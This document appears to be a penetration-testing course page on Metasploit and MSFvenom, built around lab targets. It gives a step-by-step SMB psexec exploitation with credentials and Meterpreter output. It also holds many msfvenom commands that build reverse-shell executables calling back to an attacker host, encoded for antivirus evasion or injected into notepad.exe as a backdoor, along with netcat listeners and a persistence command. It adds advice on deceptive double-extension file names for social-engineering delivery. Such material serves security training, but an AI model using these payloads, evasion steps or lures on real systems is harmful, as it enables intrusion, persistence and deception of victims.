π₯Payloads
Overview
Metasploit is an automated attack framework developed by Rapid7 that streamlines the process of exploiting vulnerabilities through the use of pre-built modules. It contains easy-to-use options to exploit vulnerabilities and deliver payloads to gain a shell on a vulnerable system.
Important Considerations
Training vs. Real-World Usage:
Some cybersecurity training vendors limit Metasploit usage on lab exams
Most organizations will not limit tool usage on engagements
Understanding tool effects is crucial to avoid destruction in live tests
Responsibility lies with the tester to understand tools, techniques, and methodologies
Metasploit Editions:
Community Edition: Free version used in this documentation
Metasploit Pro: Paid edition used by established cybersecurity firms
Metasploit Pro includes additional features for penetration tests, security audits, and social engineering campaigns
Starting Metasploit
Launch Metasploit Framework Console
sudo msfconsoleExpected Output:
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v6.0.44-dev ]
+ -- --=[ 2131 exploits - 1139 auxiliary - 363 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Writing a custom module? After editing your
module, why not try the reload command
msf6 > Key Statistics
2131 exploits: Pre-built vulnerability exploits
592 payloads: Available payload options
1139 auxiliary: Supporting modules for scanning/enumeration
363 post: Post-exploitation modules
45 encoders: Payload encoding options
10 nops: No-operation modules
8 evasion: Evasion techniques
Note: These numbers may change as maintainers add/remove modules
Practical Example: SMB Exploitation
Step 1: Target Enumeration
Nmap Scan:
nmap -sC -sV -Pn 10.129.164.25Sample Output:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 21:03 UTC
Nmap scan report for 10.129.164.25
Host is up (0.020s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Host script results:
|_nbstat: NetBIOS name: nil, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:04:e2 (VMware)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-09-09T21:03:31
|_ start_date: N/AKey Findings:
SMB service on port 445 (potential attack vector)
Windows 7-10 system
SMB message signing disabled (security weakness)
Step 2: Module Search
Search for SMB modules:
msf6 > search smbSample Output:
Matching Modules
================
# Name Disclosure Date Rank Check Description
--- ---- --------------- ---- ----- -----------
41 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
42 auxiliary/dos/windows/smb/ms05_047_pnp normal No Microsoft Plug and Play Service Registry Overflow
56 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution
60 exploit/windows/smb/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK Code ExecutionStep 3: Understanding Module Structure
Module: exploit/windows/smb/psexec
56
Module number (relative to search results)
exploit/
Module type (exploit module)
windows/
Target platform (Windows)
smb/
Service/protocol (SMB)
psexec
Tool/technique (psexec utility)
Step 4: Module Selection
msf6 > use 56Expected Response:
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > Prompt Breakdown:
exploit- Module typewindows/smb/psexec- Specific exploit pathDefault payload:
windows/meterpreter/reverse_tcp
Step 5: Examining Module Options
msf6 exploit(windows/smb/psexec) > optionsModule Options:
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate asPayload Options:
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 68.183.42.102 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen portStep 6: Configuring the Exploit
Required Settings:
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.129.180.71
RHOSTS => 10.129.180.71
msf6 exploit(windows/smb/psexec) > set SHARE ADMIN$
SHARE => ADMIN$
msf6 exploit(windows/smb/psexec) > set SMBPass HTB_@cademy_stdnt!
SMBPass => HTB_@cademy_stdnt!
msf6 exploit(windows/smb/psexec) > set SMBUser htb-student
SMBUser => htb-student
msf6 exploit(windows/smb/psexec) > set LHOST 10.10.14.222
LHOST => 10.10.14.222Configuration Breakdown:
RHOSTS: Target IP address(es)
SHARE: Administrative share (ADMIN$, C$, etc.)
SMBPass: Password for authentication
SMBUser: Username for authentication
LHOST: Local host IP for reverse connection
Step 7: Executing the Exploit
msf6 exploit(windows/smb/psexec) > exploitExecution Output:
[*] Started reverse TCP handler on 10.10.14.222:4444
[*] 10.129.180.71:445 - Connecting to the server...
[*] 10.129.180.71:445 - Authenticating to 10.129.180.71:445 as user 'htb-student'...
[*] 10.129.180.71:445 - Selecting PowerShell target
[*] 10.129.180.71:445 - Executing the payload...
[+] 10.129.180.71:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 10.129.180.71
[*] Meterpreter session 1 opened (10.10.14.222:4444 -> 10.129.180.71:49675) at 2021-09-13 17:43:41 +0000
meterpreter > Process Breakdown:
Handler Started: Reverse TCP handler listening on LHOST:LPORT
Connection: Connecting to target SMB service
Authentication: Authenticating with provided credentials
Target Selection: Selecting PowerShell target
Payload Execution: Executing the payload on target
Stage Transfer: Sending Meterpreter stage to target
Session Establishment: Meterpreter session opened
Understanding Meterpreter
What is Meterpreter?
Meterpreter is an advanced payload that:
Uses in-memory DLL injection
Establishes stealthy communication channel
Provides extensive post-exploitation capabilities
Operates entirely in memory (difficult to detect)
Key Capabilities
File Operations:
Upload/download files
File system navigation
File manipulation
System Operations:
Execute system commands
Run keylogger
Create/start/stop services
Manage processes
Network Operations:
Port forwarding
Network pivoting
Route manipulation
Advanced Features:
Screenshot capture
Webcam access
Audio recording
Registry manipulation
Meterpreter Commands
Get Help:
meterpreter > ?Common Commands:
# System Information
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
# File System
meterpreter > pwd
meterpreter > ls
meterpreter > cd <directory>
# Process Management
meterpreter > ps
meterpreter > migrate <pid>
# Network
meterpreter > ipconfig
meterpreter > route
# Persistence
meterpreter > run persistence -XDropping to System Shell
Access Full System Commands:
meterpreter > shell
Process 604 created.
Channel 1 created.
Microsoft Windows [Version 10.0.18362.1256]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>Return to Meterpreter:
C:\WINDOWS\system32> exit
meterpreter > Metasploit Module Types
1. Exploit Modules
Purpose: Exploit specific vulnerabilities Example: exploit/windows/smb/psexec Usage: Gain initial access to systems
2. Auxiliary Modules
Purpose: Scanning, enumeration, and verification Example: auxiliary/scanner/smb/smb_version Usage: Information gathering and reconnaissance
3. Post Modules
Purpose: Post-exploitation activities Example: post/windows/gather/credentials/credential_collector Usage: After gaining access, collect information
4. Payload Modules
Purpose: Code executed on target after exploitation Example: windows/meterpreter/reverse_tcp Usage: Establish communication channel
5. Encoder Modules
Purpose: Encode payloads to avoid detection Example: x86/shikata_ga_nai Usage: Bypass antivirus and filters
6. NOP Modules
Purpose: No-operation instructions for buffer alignment Example: x86/opty2 Usage: Ensure payload stability
MSFVenom - Standalone Payload Generator
Basic Usage
Generate Windows Reverse Shell:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.222 LPORT=4444 -f exe -o shell.exeGenerate Linux Reverse Shell:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.222 LPORT=4444 -f elf -o shell.elfGenerate PHP Web Shell:
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.222 LPORT=4444 -f raw -o shell.phpCommon Parameters
-p
Payload type
windows/meterpreter/reverse_tcp
-f
Output format
exe, elf, raw, python
-o
Output file
shell.exe
-e
Encoder
x86/shikata_ga_nai
-i
Encoding iterations
3
-b
Bad characters
\x00\x0a\x0d
Advanced MSFVenom Examples
Encoded Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.222 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o encoded_shell.exeCustom Template:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.222 LPORT=4444 -x notepad.exe -f exe -o backdoored_notepad.exeBest Practices
1. Reconnaissance First
Always perform thorough enumeration
Identify target OS and services
Understand network topology
Gather credentials when possible
2. Module Selection
Choose appropriate exploit for target
Consider payload options
Understand module limitations
Test in lab environment first
3. Payload Considerations
Select appropriate payload type
Consider network restrictions
Plan for persistence needs
Understand detection risks
4. Operational Security
Use common ports when possible
Consider encoding for AV evasion
Clean up artifacts after testing
Document all actions taken
5. Session Management
Migrate to stable processes
Create multiple access points
Use appropriate persistence methods
Monitor for detection
Troubleshooting
Common Issues
1. Module Not Found:
msf6 > updatedb
msf6 > reload_all2. Payload Mismatch:
msf6 exploit(windows/smb/psexec) > show payloads
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp3. Connection Issues:
# Check firewall rules
# Verify network connectivity
# Confirm correct IP addresses4. Authentication Failures:
# Verify credentials
# Check domain settings
# Try different authentication methodsDebugging Commands
Show Module Information:
msf6 > info exploit/windows/smb/psexecCheck Payload Options:
msf6 exploit(windows/smb/psexec) > show options
msf6 exploit(windows/smb/psexec) > show payloadsSession Management:
msf6 > sessions -l
msf6 > sessions -i 1
msf6 > sessions -k 1Security Considerations
Detection Risks
Network Level:
Unusual network connections
Known malicious signatures
Behavioral analysis triggers
Host Level:
Process injection detection
In-memory payload signatures
Behavioral monitoring alerts
Mitigation Strategies
For Penetration Testers:
Use custom payloads
Implement proper encoding
Time attacks appropriately
Clean up after testing
For Defenders:
Monitor for known signatures
Implement behavioral analysis
Use application whitelisting
Regular security updates
Summary
Metasploit provides a powerful framework for:
Automated exploitation of known vulnerabilities
Payload delivery through various attack vectors
Post-exploitation activities and persistence
Comprehensive testing of security controls
Key takeaways:
Understand tools before using them
Proper enumeration guides module selection
Meterpreter provides extensive post-exploitation capabilities
Always consider detection and mitigation strategies
Practice in controlled environments first
The combination of Metasploit's exploit modules and payload delivery system makes it an invaluable tool for security professionals, but it requires proper understanding and responsible use to avoid unintended consequences in production environments.
Crafting Payloads with MSFvenom
Understanding Payload Delivery Challenges
Using automated attacks in Metasploit requires network access to vulnerable target machines. However, there are situations where we lack direct network access to a target. In these cases, we need alternative delivery methods such as:
Email attachments with malicious payloads
Social engineering to drive user execution
Physical access via USB drives during onsite tests
Web downloads from compromised or controlled sites
MSFvenom addresses these challenges by providing:
Flexible delivery options for various scenarios
Encryption & encoding to bypass antivirus detection
Multiple output formats for different platforms
Standalone payload generation without full Metasploit
Exploring Available Payloads
List all available payloads:
msfvenom -l payloadsSample Output:
Framework Payloads (592 total) [--payload <value>]
==================================================
Name Description
---- -----------
linux/x86/shell/reverse_nonx_tcp Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell/reverse_tcp_uuid Spawn a command shell (staged). Connect back to the attacker
linux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell
linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell
linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell
linux/zarch/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)
windows/dllinject/bind_tcp Inject a DLL via a reflective loader. Listen for a connection (Windows x86)
windows/dllinject/reverse_tcp Inject a DLL via a reflective loader. Connect back to the attacker
nodejs/shell_bind_tcp Creates an interactive shell via nodejs
nodejs/shell_reverse_tcp Creates an interactive shell via nodejsStaged vs. Stageless Payloads
Staged Payloads
Characteristics:
Create a way to send more components of the attack
"Setting the stage" for additional functionality
Send small initial stage, then download remainder over network
Requires multiple network communications
Example: linux/x86/shell/reverse_tcp
Initial stage executed on target
Calls back to attack box for remainder
Downloads and executes shellcode
Establishes reverse shell connection
Advantages:
Smaller initial payload size
Can deliver larger, more complex payloads
Flexibility in payload composition
Disadvantages:
Multiple network communications required
Dependent on network stability
Takes up memory space for stages
More detectable due to network traffic
Stageless Payloads
Characteristics:
Complete payload sent in its entirety
No additional network communications required
Self-contained executable code
Single network transmission
Example: linux/zarch/meterpreter_reverse_tcp
Complete payload in one transmission
No additional downloads required
Executes immediately upon receipt
Advantages:
Better for bandwidth-limited environments
Reduced network traffic (better evasion)
No dependency on network stability
Faster execution
Disadvantages:
Larger payload size
Limited by single transmission constraints
Less flexibility in payload composition
Identifying Staged vs. Stageless Payloads
Naming Convention Rules
Staged Payloads:
Each
/represents a stageExample:
linux/x86/shell/reverse_tcp/shell/= stage to send/reverse_tcp= another stage
Stageless Payloads:
All components in single function name
Example:
linux/zarch/meterpreter_reverse_tcpmeterpreter_reverse_tcp= complete payload
Comparison Examples
windows/meterpreter/reverse_tcp
windows/meterpreter_reverse_tcp
linux/x86/shell/reverse_tcp
linux/x86/shell_reverse_tcp
windows/shell/bind_tcp
windows/shell_bind_tcp
Building Stageless Payloads
Linux ELF Payload Example
Command:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elfOutput:
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytesCommand Breakdown:
msfvenom
Tool used to create the payload
-p
Indicates creating a payload
linux/x64/shell_reverse_tcp
Linux 64-bit stageless reverse shell
LHOST=10.10.14.113
IP address to connect back to
LPORT=443
Port to connect back to
-f elf
Output format (ELF binary)
> createbackup.elf
Output filename
Windows EXE Payload Example
Command:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exeOutput:
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytesPayload Delivery Methods
1. Email Attachments
Advantages:
Direct user interaction
Can target specific individuals
Bypasses network perimeter controls
Considerations:
Email security filters
User awareness training
Antivirus scanning
2. Web Downloads
Advantages:
Wide distribution potential
Can be combined with social engineering
Multiple delivery vectors
Considerations:
Web application firewalls
Browser security features
User download behavior
3. Physical Media
Advantages:
Bypasses network controls
High success rate if executed
Direct access to target environment
Considerations:
Physical security controls
Autorun policies
User education
4. Combined with Exploits
Advantages:
Automated delivery
Leverages existing vulnerabilities
Part of broader attack chain
Considerations:
Requires network access
Depends on vulnerability existence
May be detected by security tools
Executing Payloads
Linux Payload Execution
Setup listener:
sudo nc -lvnp 443When payload executes:
sudo nc -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.129.138.85 60892
env
PWD=/home/htb-student/Downloads
cd ..
ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
VideosWindows Payload Execution
Setup listener:
sudo nc -lvnp 443When payload executes:
sudo nc -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.129.144.5 49679
Microsoft Windows [Version 10.0.18362.1256]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\htb-student\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is DD25-26EB
Directory of C:\Users\htb-student\Downloads
09/23/2021 10:26 AM <DIR> .
09/23/2021 10:26 AM <DIR> ..
09/23/2021 10:26 AM 73,802 BonusCompensationPlanpdf.exe
1 File(s) 73,802 bytes
2 Dir(s) 9,997,516,800 bytes freeAdvanced MSFvenom Techniques
Multiple Format Support
Common formats:
# Windows formats
-f exe # Windows executable
-f dll # Windows DLL
-f msi # Windows installer
-f aspx # ASP.NET web application
-f aspx-exe # ASP.NET executable
# Linux formats
-f elf # Linux executable
-f elf-so # Linux shared object
# Cross-platform formats
-f jar # Java archive
-f war # Web application archive
-f python # Python script
-f powershell # PowerShell script
-f bash # Bash scriptEncoding for Evasion
Basic encoding:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -e x86/shikata_ga_nai -f exe > encoded_payload.exeMultiple encoding iterations:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -e x86/shikata_ga_nai -i 3 -f exe > multi_encoded.exeTemplate Injection
Inject into existing executable:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -x notepad.exe -f exe > backdoored_notepad.exeBad Character Removal
Remove problematic characters:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -b '\x00\x0a\x0d' -f exe > clean_payload.exePlatform-Specific Considerations
Windows Considerations
Antivirus Evasion:
Use encoders and encryption
Template injection techniques
Fileless payload delivery
Process hollowing techniques
Execution Methods:
Double-click execution
Command line execution
Scheduled tasks
Service installation
Linux Considerations
Permission Requirements:
Executable permissions needed
User context considerations
Privilege escalation needs
Execution Methods:
Direct execution
Bash/shell execution
Cron job scheduling
Service daemon installation
Social Engineering Integration
Filename Strategies
Convincing Filenames:
BonusCompensationPlan.pdf.exeSecurityUpdate.exeInstallationWizard.exeDocumentViewer.exe
File Extension Manipulation:
Use double extensions
Hide real extension
Use similar-looking extensions
Leverage file association weaknesses
Delivery Context
Business Context:
Quarterly reports
Security updates
Software installations
Training materials
Personal Context:
Photos/videos
Games/entertainment
Personal documents
Utilities/tools
Detection and Countermeasures
Common Detection Methods
Signature-based Detection:
Known payload signatures
Behavioral pattern matching
Heuristic analysis
Behavioral Analysis:
Network communication patterns
Process execution behavior
File system modifications
Evasion Techniques
Payload Modification:
Custom encoding schemes
Polymorphic payloads
Encrypted communications
Delayed execution
Delivery Modification:
Staged delivery
Legitimate application abuse
Living-off-the-land techniques
Memory-only execution
MSFvenom Best Practices
Payload Selection
Choose appropriate payload type (staged vs stageless)
Consider target platform and architecture
Evaluate network restrictions and firewall rules
Plan for persistence and post-exploitation needs
Delivery Planning
Understand target environment and security controls
Plan social engineering context and delivery method
Prepare backup delivery methods in case of failure
Consider detection timing and operational security
Operational Security
Use common ports for better success rates
Implement proper encoding for AV evasion
Clean up artifacts after successful execution
Monitor for detection and adjust accordingly
Troubleshooting MSFvenom
Common Issues
Payload Size Limitations:
# Check payload size
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 --smallestArchitecture Mismatches:
# Specify architecture explicitly
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > payload64.exeEncoding Failures:
# Try different encoders
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -e x86/alpha_mixed -f exe > alpha_encoded.exeVerification Methods
Test payload functionality:
# Check payload structure
file payload.exe
strings payload.exe
# Test in isolated environment
# Verify listener connectivity
# Confirm execution behaviorIntegration with Other Tools
Combining with Social Engineering
Social Engineering Toolkit (SET):
Automated payload delivery
Credential harvesting
Phishing campaigns
Custom Scripts:
Automated payload generation
Batch processing
Custom encoding schemes
Post-Exploitation Integration
Meterpreter Migration:
# After payload execution
meterpreter > ps
meterpreter > migrate <stable_process_pid>Persistence Establishment:
# Create persistent access
meterpreter > run persistence -X -i 10 -p 443 -r 10.10.14.113This comprehensive coverage of MSFvenom payload crafting provides the foundation for understanding both the technical aspects and practical applications of standalone payload generation in penetration testing scenarios.
Advanced Meterpreter Techniques
For detailed post-exploitation techniques, advanced commands, and comprehensive Meterpreter usage, see the dedicated Meterpreter Post-Exploitation Guide.
Last updated